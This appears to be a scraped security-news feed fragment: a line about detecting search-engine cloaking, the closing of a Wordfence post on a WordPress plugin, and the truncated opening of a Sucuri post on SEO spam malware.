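Against a live site, call `cloaked_blocks(fetch_as(url, BROWSER_UA), fetch_as(url, GOOGLEBOT_UA))`; an empty list is the expected result for a site that is not cloaking.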

We are contacting the WordPress plugin repository maintainers who will likely remove the plugin by the time you read this post. Now that you’re fully informed, we suggest you make up your own mind about whether or not you want to keep this plugin installed if you have it on your site.

As always we welcome your comments. Please note: We have disabled comments on this post due to the inflammatory nature of some of the comments we’re receiving.

All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.

The post 404 to 301 Plugin Considered Harmful appeared first on Wordfence.


Seo-moz.com SEO Spam Campaign

Here at Sucuri we handle countless cases of SEO spam. This malware involves a website being compromised in order to spread (mostly pharmaceutical) advertisements by linking visitors to unwanted websites and stuffing spam keywords into the site. These links and keywords help the spam websites to rank higher in search engines like Google, sending even

The post Seo-moz.com SEO Spam Campaign appeared first on Sucuri Blog.